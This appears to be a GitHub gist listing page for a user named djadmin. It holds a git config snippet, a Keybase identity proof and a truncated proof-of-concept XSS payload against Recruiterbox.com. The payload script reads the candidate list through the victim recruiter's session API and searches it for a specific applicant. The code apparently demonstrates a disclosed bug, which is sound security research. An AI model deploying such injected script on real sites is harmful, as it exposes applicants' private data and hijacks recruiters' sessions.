HTTPS
https://djadmin.github.io/pwn/referer.html
HTTP
Dheeraj Joshi djadmin
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ vim .git/config | |
| push = +refs/heads/master:refs/heads/gh-pages | |
| push = +refs/heads/master:refs/heads/master |
djadmin
/ keybase.md
Created
July 29, 2016 20:20
I hereby claim:
- I am djadmin on github.
- I am djadmin (https://keybase.io/djadmin) on keybase.
- I have a public key ASBLZvlfekLas6TmwWb9gY2awd79PVfROH9v4DsZadSzvwo
To claim this, I am signing this object:
djadmin
/ recruiterbox_exploit.js
Last active
August 10, 2016 09:10
Recruiterbox.com HTML Injection Exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Below code was used to demonstrate hiring made so easy - Recruiterbox XSS. | |
| var candidates = []; | |
| var request = new XMLHttpRequest(); | |
| request.open('GET', '/api/v1/candidates/', true); | |
| request.onload = function() { | |
| var data = JSON.parse(request.responseText); | |
| console.log(data); | |
| candidates = data && data.objects; | |
| var profile = candidates.find(function (cand) { | |
| return cand.first_name === 'Dheeraj' && cand.last_name === 'Joshi'; |
OlderNewer